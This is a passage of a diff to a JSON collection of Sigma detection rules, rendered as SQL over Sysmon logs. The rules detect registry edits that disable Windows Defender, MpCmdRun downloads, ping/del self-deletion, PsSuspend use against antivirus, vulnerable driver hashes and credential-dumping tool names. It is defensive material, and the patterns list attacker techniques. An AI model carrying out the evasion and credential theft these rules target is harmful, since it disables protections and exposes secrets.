'%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "status": "test", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", + "status": "experimental", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21edff2937eb5cd6f6b0acb7ee5247681f624260%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f052dc35b74a1a6246842fbb35eb481577537826%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f0c463d29a5914b01e4607889094f1b7d95e7aaf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0c26ab1299adcd9a385b541ef1653728270aa23e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f36a47edfacd85e0c6d4d22133dd386aee4eec15%' ESCAPE '\\' OR Hashes LIKE '%SHA1=460008b1ffd31792a6deadfa6280fb2a30c8a5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=738b7918d85e5cb4395df9e3f6fc94ddad90e939%' ESCAPE '\\' OR Hashes LIKE '%SHA1=43419df1f9a07430a18c5f3b3cc74de621be0f8e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=558aad879b6a47d94a968f39d0a4e3a3aaef1ef1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7fb52290883a6b69a96d480f2867643396727e83%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f5696fb352a3fbd14fb1a89ad21a71776027f9ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=693a2645c28fc3b248fda95179c36c3ac64f6fc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d25340ae8e92a6d29f599fef426a2bc1b5217299%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe10018af723986db50701c8532df5ed98b17c39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a21c84c6bf2e21d69fa06daaf19b4cc34b589347%' ESCAPE '\\' OR Hashes LIKE '%SHA1=82ba5513c33e056c3f54152c8555abf555f3e745%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d098600152e5ee6a8238d414d2a77a34da8afaaa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=64e4ac8b9ea2f050933b7ec76a55dd04e97773b4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc1e5fd826961d93b76abd161314cb3592c4436%' ESCAPE '\\' OR Hashes LIKE '%SHA1=90a76945fd2fa45fab2b7bcfdaf6563595f94891%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b03b1996a40bfea72e4584b82f6b845c503a9748%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c771ea59f075170e952c393cfd6fc784b265027c%' ESCAPE '\\' OR Hashes LIKE 